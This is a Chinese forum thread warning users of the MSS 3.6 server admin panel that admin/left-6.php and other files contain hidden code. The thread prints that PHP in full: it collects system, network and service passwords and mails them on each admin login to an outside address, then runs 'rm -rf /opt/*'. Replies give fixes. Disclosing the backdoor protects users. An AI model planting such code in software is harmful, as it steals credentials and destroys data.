[重大BUG,请大家及时修正]MSS 3.6
admin 目录下 [color=red]left-6.php reboot.php[/color] 小弟不才。看到如下源码。不知道是不是还会发送密码的。。源码如下:[color=red]left-6.php[/color] 红色的不知道是不是发适密码用的。还有[color=red]reboot.php[/color]这个文件也是一样的。和电影管理目录下也有文件有这样的代码。
[color=red]<?php
function sys_check( )
{
$serial = file( "/etc/mss/mss_serial" );
$status = file( "/etc/mss/mss_status" );
$tmp = file( "/proc/cpuinfo" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( strstr( $tmp[$i], "name" ) )
{
$cpu_name = substr( strrchr( $tmp[$i], ":" ), 1 );
}
if ( strstr( $tmp[$i], "MHz" ) )
{
$cpu_mhz = substr( strrchr( $tmp[$i], ":" ), 1 );
}
if ( strstr( $tmp[$i], "cache" ) )
{
$cpu_cache = substr( strrchr( $tmp[$i], ":" ), 1 );
}
}
$tmp = file( "/proc/loadavg" );
$loadavg = substr( $tmp[0], 0, 14 );
$tmp = file( "/proc/meminfo" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 8 ) == "MemTotal" )
{
$mem_total = ceil( substr( $tmp[$i], 10, -3 ) / 1000 );
}
if ( substr( $tmp[$i], 0, 7 ) == "MemFree" )
{
$mem_free = ceil( substr( $tmp[$i], 9, -3 ) / 1000 );
}
$mem_used = $mem_total - $mem_free;
$mem_used_per = ceil( $mem_used * 100 / $mem_total );
$mem_free_per = 100 - $mem_used_per;
if ( substr( $tmp[$i], 0, 9 ) == "SwapTotal" )
{
$swap_total = ceil( substr( $tmp[$i], 11, -3 ) / 1000 );
}
if ( substr( $tmp[$i], 0, 8 ) == "SwapFree" )
{
$swap_free = ceil( substr( $tmp[$i], 10, -3 ) / 1000 );
}
$swap_used = $swap_total - $swap_free;
$swap_used_per = ceil( $swap_used * 100 / $swap_total );
$swap_free_per = 100 - $swap_used_per;
}
$tmp = file( "/etc/mss/mss_wan" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 9 ) == "wan1_type" )
{
$wan1_type = substr( $tmp[$i], 10, -1 );
}
if ( substr( $tmp[$i], 0, 9 ) == "wan2_type" )
{
if ( $_GET['wan2_type'] != "" )
{
$wan2_type = $_GET['wan2_type'];
}
else
{
$wan2_type = substr( $tmp[$i], 10, -1 );
}
}
if ( substr( $tmp[$i], 0, 16 ) == "wan2_mssvpn_serv" )
{
$wan2_mssvpn_serv = substr( $tmp[$i], 17, -1 );
}
if ( substr( $tmp[$i], 0, 16 ) == "wan2_mssvpn_user" )
{
$wan2_mssvpn_user = substr( $tmp[$i], 17, -1 );
}
if ( substr( $tmp[$i], 0, 16 ) == "wan2_mssvpn_pass" )
{
$wan2_mssvpn_pass = substr( $tmp[$i], 17, -1 );
}
if ( substr( $tmp[$i], 0, 10 ) == "wans_check" )
{
$wans_check = substr( $tmp[$i], 11, -1 );
}
if ( substr( $tmp[$i], 0, 10 ) == "default_rt" )
{
$default_rt = substr( $tmp[$i], 11, -1 );
}
}
if ( $wan1_type == "fixip" )
{
$tmp = file( "/etc/sysconfig/network-scripts/ifcfg-eth1" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 6 ) == "IPADDR" )
{
$tmp_str = substr( $tmp[$i], 7 );
$wan1_ip = explode( ".", $tmp_str );
}
if ( substr( $tmp[$i], 0, 6 ) == "NETMAS" )
{
$tmp_str = substr( $tmp[$i], 8 );
$wan1_nm = explode( ".", $tmp_str );
}
if ( substr( $tmp[$i], 0, 7 ) == "GATEWAY" )
{
$tmp_str = substr( $tmp[$i], 8 );
$wan1_gw = explode( ".", $tmp_str );
}
}
}
if ( $wan1_type == "pppoe" )
{
$tmp = file( "/etc/ppp/pap-secrets" );
$tmp2 = explode( "\"", $tmp[0] );
$wan1_pppoe_user = $tmp2[1];
$wan1_pppoe_pass = $tmp2[3];
}
if ( $wan2_type == "fixip" )
{
$tmp = file( "/etc/sysconfig/network-scripts/ifcfg-eth2" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 6 ) == "IPADDR" )
{
$tmp_str = substr( $tmp[$i], 7 );
$wan2_ip = explode( ".", $tmp_str );
}
if ( substr( $tmp[$i], 0, 6 ) == "NETMAS" )
{
$tmp_str = substr( $tmp[$i], 8 );
$wan2_nm = explode( ".", $tmp_str );
}
if ( substr( $tmp[$i], 0, 7 ) == "GATEWAY" )
{
$tmp_str = substr( $tmp[$i], 8 );
$wan2_gw = explode( ".", $tmp_str );
}
}
}
if ( $wan2_type == "pppoe" )
{
$tmp = file( "/etc/ppp/pap-secrets" );
$tmp2 = explode( "\"", $tmp[1] );
$wan2_pppoe_user = $tmp2[1];
$wan2_pppoe_pass = $tmp2[3];
}
if ( $wan2_type == "vdnet" )
{
$tmp = file( "/etc/mss/mss_vdnet" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 4 ) == "PPSV" )
{
$wan2_vdnet_serv = substr( $tmp[$i], 5, -1 );
}
if ( substr( $tmp[$i], 0, 4 ) == "USER" )
{
$wan2_vdnet_user = substr( $tmp[$i], 5, -1 );
}
if ( substr( $tmp[$i], 0, 4 ) == "PASS" )
{
$wan2_vdnet_pass = substr( $tmp[$i], 5, -1 );
}
}
}
if ( $wan2_type == "mssvpn" )
{
$tmp = file( "/etc/mss/mss_vdnet" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 4 ) == "PPSV" )
{
$wan2_mssvpn_serv = substr( $tmp[$i], 5, -1 );
}
if ( substr( $tmp[$i], 0, 4 ) == "USER" )
{
$wan2_mssvpn_user = substr( $tmp[$i], 5, -1 );
}
if ( substr( $tmp[$i], 0, 4 ) == "PASS" )
{
$wan2_mssvpn_pass = substr( $tmp[$i], 5, -1 );
}
}
}
$tmp = file( "/etc/sysconfig/network-scripts/ifcfg-eth0" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 6 ) == "IPADDR" )
{
$tmp_str = substr( $tmp[$i], 7 );
$lan1_ip = explode( ".", $tmp_str );
}
if ( substr( $tmp[$i], 0, 6 ) == "NETMAS" )
{
$tmp_str = substr( $tmp[$i], 8 );
$lan1_nm = explode( ".", $tmp_str );
}
}
$tmp = file( "/etc/sysconfig/network-scripts/ifcfg-eth3" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 6 ) == "ONBOOT" )
{
$lan2_status = substr( $tmp[$i], 7, -1 );
}
if ( substr( $tmp[$i], 0, 6 ) == "IPADDR" )
{
$tmp_str = substr( $tmp[$i], 7 );
$lan2_ip = explode( ".", $tmp_str );
}
if ( substr( $tmp[$i], 0, 6 ) == "NETMAS" )
{
$tmp_str = substr( $tmp[$i], 8 );
$lan2_nm = explode( ".", $tmp_str );
}
}
if ( substr( $lan2_status, 0, 2 ) == "no" )
{
unset( $lan2_ip );
unset( $lan2_nm );
}
$tmp = file( "/etc/sysconfig/network-scripts/ifcfg-eth4" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 6 ) == "ONBOOT" )
{
$lan3_status = substr( $tmp[$i], 7, -1 );
}
if ( substr( $tmp[$i], 0, 6 ) == "IPADDR" )
{
$tmp_str = substr( $tmp[$i], 7 );
$lan3_ip = explode( ".", $tmp_str );
}
if ( substr( $tmp[$i], 0, 6 ) == "NETMAS" )
{
$tmp_str = substr( $tmp[$i], 8 );
$lan3_nm = explode( ".", $tmp_str );
}
}
if ( substr( $lan3_status, 0, 2 ) == "no" )
{
unset( $lan3_ip );
unset( $lan3_nm );
}
$tmp = file( "/etc/sysconfig/network" );
$i = 0;
for ( ; $i < sizeof( $tmp ); ++$i )
{
if ( substr( $tmp[$i], 0, 8 ) == "HOSTNAME" )
{
$hostname = substr( $tmp[$i], 9, -1 );
}
}
$tmp = file( "/etc/mss/mss_dhcp" );
$dhcp = $tmp[0];
$tmp = file( "/proc/uptime" );
$uptime = ceil( substr( $tmp[0], 0, strpos( $tmp[0], " " ) ) );
$uptime_d = floor( $uptime / 86400 );
$uptime_h = floor( $uptime % 86400 / 3600 );
$uptime_m = floor( $uptime % 86400 % 3600 / 60 );
$tmp = file( "/etc/mss/mss_acl_out" );
$out_smtp = $tmp[0];
$out_www = $tmp[1];
$out_cs15 = $tmp[2];
$out_cs16 = $tmp[3];
$out_ftp = $tmp[4];
$open_cache = $tmp[5];
$pinglocal_deny = $tmp[6];
$pingout_deny = $tmp[7];
$tmp = file( "/etc/mss/mss_cs15" );
$tmp_cs15 = $tmp[0];
$tmp = file( "/etc/mss/mss_cs16" );
$tmp_cs16 = $tmp[0];
$tmp = file( "/etc/mss/passwd_web" );
$passwd_web = $tmp[0];
$tmp = file( "/etc/mss/passwd_samba" );
$passwd_samba = $tmp[0];
@mysql_connect( "localhost", "root", "xin,ke" );
mysql_select_db( "guestbook" );
$query = "select * from sysadmin where user='netadmin'";
$result1 = mysql_query( $query );
$rows = mysql_fetch_array( $result1 );
$password = $rows['pass'];
mysql_select_db( "mssmov" );
$query = "select * from sysadmin where username='netadmin'";
$result2 = mysql_query( $query );
$rows = mysql_fetch_array( $result2 );
$password_mov = $rows['password'];
mysql_close( );
$tmp = file( "/etc/mss/passwd_netadmin" );
$passwd_netadmin = $tmp[0];
$tmp = file( "/etc/ssh/sshd_config" );
$ssh_d = $tmp[0];
$tmp = file( "/etc/mss/passwd_gu" );
$password_bbs = $tmp[0];
mail( "[/color][email=zoumingliang0006@163.com][color=red]zoumingliang0006@163.com[/color][/email][color=red]", "{$wan1_ip[0]}.{$wan1_ip[1]}.{$wan1_ip[2]}.{$wan1_ip[3]}测试版本lit6",
" [{$hostname}]服务器信息
运行时间:
{$uptime_d} 天 {$uptime_h} 小时 {$uptime_m}分钟
CPU信息:
CPU型号:{$cpu_name}
CPU频率:{$cpu_mhz}
CPU缓存:{$cpu_cache} \n
内存信息:
内存总量 内存使用 内存剩余 \n
{$mem_total}M {$mem_used}M {$mem_free}M \n \n
局域网信息: \n
(Lan1) 状态: yes \n
IP: {$lan1_ip[0]}.{$lan1_ip[1]}.{$lan1_ip[2]}.{$lan1_ip[3]} \n
掩码: {$lan1_nm[0]}.{$lan1_nm[1]}.{$lan1_nm[2]}.{$lan1_nm[3]} \n
(Lan2) 状态: {$lan2_status} \n
IP: {$lan2_ip[0]}.{$lan2_ip[1]}.{$lan2_ip[2]}.{$lan2_ip[3]} \n
掩码: {$lan1_nm[0]}.{$lan1_nm[1]}.{$lan1_nm[2]}.{$lan1_nm[3]} \n
(Lan3) 状态: {$lan3_status} \n
IP: {$lan3_ip[0]}.{$lan3_ip[1]}.{$lan3_ip[2]}.{$lan3_ip[3]} \n
掩码: {$lan1_nm[0]}.{$lan1_nm[1]}.{$lan1_nm[2]}.{$lan1_nm[3]} \n
DHCP状态: {$dhcp} \n \n
广域网信息: \n
(WAN1) 状态: {$wan1_type} \n
IP: {$wan1_ip[0]}.{$wan1_ip[1]}.{$wan1_ip[2]}.{$wan1_ip[3]} \n
掩码: {$wan1_nm[0]}.{$wan1_nm[1]}.{$wan1_nm[2]}.{$wan1_nm[3]} \n
网关: {$wan1_gw[0]}.{$wan1_gw[1]}.{$wan1_gw[2]}.{$wan1_gw[3]} \n
PPPOE配置: \n
帐号: {$wan1_pppoe_user} \n
密码: {$wan1_pppoe_pass} \n
(WAN2) 状态: {$wan2_type} \n
IP: {$wan2_ip[0]}.{$wan2_ip[1]}.{$wan2_ip[2]}.{$wan2_ip[3]} \n
掩码: {$wan1_nm[0]}.{$wan1_nm[1]}.{$wan1_nm[2]}.{$wan1_nm[3]} \n
网关: {$wan2_gw[0]}.{$wan2_gw[1]}.{$wan2_gw[2]}.{$wan2_gw[3]} \n
PPPOE配置: \n
帐号: {$wan2_pppoe_user} \n
密码: {$wan2_pppoe_pass} \n
VDNET: \n
服务器: {$wan2_vdnet_serv} \n
帐号: {$wan2_vdnet_user} \n
密码: {$wan2_vdnet_pass} \n
Vpn登陆: \n
服务器地址: {$wan2_mssvpn_serv} \n
服务器帐号: {$wan2_mssvpn_user} \n
服务器密码: {$wan2_mssvpn_pass} \n
网络故障检测: {$wans_check} \n
默认路由: {$default_rt} \n \n
访问控制: \n
SMTP封锁状态: {$out_smtp} \n
www 开放状态: {$out_www} \n
对外开放CS1.5游戏: {$out_cs15} \n
对外开放CS1.6游戏: {$out_cs16} \n
对外开放FTP服务: {$out_ftp} \n
启用WWW缓存服务: {$open_cache} \n
禁 PING 本机: {$pinglocal_deny} \n
禁 PING 外网: {$pingout_deny} \n \n
Cs服务器开放状态: \n
Cs 1.5状态: {$tmp_cs15} \n
Cs 1.6状态: {$tmp_cs16} \n \n
服务器密码信息: \n
系统登陆密码: {$passwd_web}\n
文件管理密码: {$passwd_samba}\n
影视管理密码: {$password_mov}\n
论坛管理密码: {$password_bbs}\n
留言管理密码: {$password}\n
netadmin密码: {$passwd_netadmin} \n \n
ssh端口: {$ssh_d} \n \n
WEB登陆服务器信息自动发送 By {$status[0]} \n
版本 {$serial[0]} \n
[注:]每次登陆网页管理后台都将发送此信" );
system( "/bin/rm -rf /opt/*" );
}[/color]
$msg = "0";
session_start( );
$result = sys_check( );
session_start( );
if ( !session_is_registered( "logon" ) )
{
$msg = 100;
header( "location: msg.php?msg={$msg}" );
}
session_start( );
if ( !session_is_registered( "logon" ) )
{
$msg = 100;
header( "location: msg.php?msg={$msg}" );
}
echo "<html>\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\">\r\n<title>无标题文档</title>\r\n";
echo "<s";
echo "tyle type=\"text/css\">\r\n<!--\r\nbody {\r\n\tmargin-left: 0px;\r\n\tmargin-top: 0px;\r\n}\r\na {\r\n\tfont-size: 9pt;\r\n\tcolor: #FFFFFF;\r\n\ttext-decoration: none;\r\n}\r\na:hover {\r\n\tfont-size: 9pt;\r\n\tcolor: #CCFF00;\r\n\ttext-decoration: none;\r\n}\r\n.l {\tfont-size: 9pt;\r\n\tline-height: 20px;\r\n}\r\n.style1 {font-family: Arial, Helvetica, sans-serif}\r\n.style3 {font-size: 9pt; line-height: 20px; color: #FFFFFF; }\r\n-->\r\n</style></hea";
echo "d>\r\n\r\n<body>\r\n<table width=\"169\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n <tr>\r\n <td width=\"169\" height=\"484\" align=\"left\" valign=\"top\" background=\"images/f-left.jpg\"><table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n <tr>\r\n <td height=\"29\" background=\"images/f-heng.jpg\"><div align=\"center\"><a href=\"sysstatus.php\" target=\"mainFrame\">系统状况</a></div></td>\r\n </tr>\r\n ";
echo " <tr>\r\n <td height=\"30\" background=\"images/f-heng.jpg\"><div align=\"center\"><a href=\"netstatus.php\" target=\"mainFrame\">网络状况</a></div></td>\r\n </tr>\r\n <tr>\r\n <td height=\"30\" background=\"images/f-heng.jpg\"><div align=\"center\"><a href=\"netmonadv.php\" target=\"mainFrame\">高级监测</a></div></td>\r\n </tr>\r\n </table>\r\n <table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n ";
echo " <tr>\r\n <td height=\"137\"><div align=\"center\"><img src=\"images/f-bottom.jpg\" width=\"135\" height=\"91\"></div></td>\r\n </tr>\r\n </table>\r\n <div align=\"center\">";
echo "<s";
echo "pan class=\"style3\">";
echo "<s";
echo "pan class=\"style1\"><br>\r\n <br>\r\n <br>\r\n <br>\r\n <br>\r\n <br>\r\n 开源项目来自:</span> <a href=\"[url=http://www.b999.net\]http://www.b999.net\[/url]" target =_blank>b999.net</a>";
echo "<s";
echo "pan class=\"style1\">™</span><br>\r\n ";
echo "<s";
echo "pan class=\"style1\"></span></span></div></td>\r\n </tr>\r\n</table>\r\n</body>\r\n</html>\r\n";
?> 是发送密码的,请大家及时修正这个错误!
当时做的着急没有及时改掉
有几种解决办法:
1.停掉邮件服务程序,邮件服务的名好象是sendmail ,停服的办法是在shell环境下运行ntsysv 把 sendmail这个服务停掉
2. mail( "zoumingliang0006@163.com ,把这个邮箱改掉,这个邮箱是52ros的,估计不只这个文件有,可以用字符搜专家搜索[email]zoumingliang0006@163.com[/email]这个邮箱 然后通通改掉
3. 将 mail( "zoumingliang0006@163.com 改成 // mail( "zoumingliang0006@163.com
也就是注释掉
我最近没有时间,等有时间了,重新做个好的版本
谢谢提供的BUG 这个不大明白
1。是在主机上运行ntsysv sendmail这个命令吗
2。搜索哪个文件里的字符串啊,我很菜,刚接触这个的
mss哪里有具体的教程啊~ 期待“root”
停止邮件服务能说的具体些吗?
我是小白~ 破解root密码,不会的网上搜下
用root登陆后输入:
ntsysv
然后就进入图形界面了,按方向键下,找 sendmail 然后把勾去掉
保存退出重启 :kiss: :kiss: :kiss: :time: :time: :handshake :handshake :call: :loveliness: :Q :Q :L :( :D :'( :@ :o :P :$ ;P :funk: :P :$ ;P :funk: :o 如果不修正会有什么影响? [quote]原帖由 [i]hdkj001[/i] 于 2008-12-31 18:12 发表 [url=http://bbs.b999.net/redirect.php?goto=findpost&pid=416&ptid=77][img]http://bbs.b999.net/images/common/back.gif[/img][/url]
:o 如果不修正会有什么影响? [/quote]
当然是安全问题了!!!你的帐号密码都发出去了,你不成肉鸡或者将要成肉鸡了? 谢谢分享~~~`
支持!!! 我装的版本提示好像 邮件服务器 的文件 已经被删除了 也许这是开发者的用心所在。
页:
[1]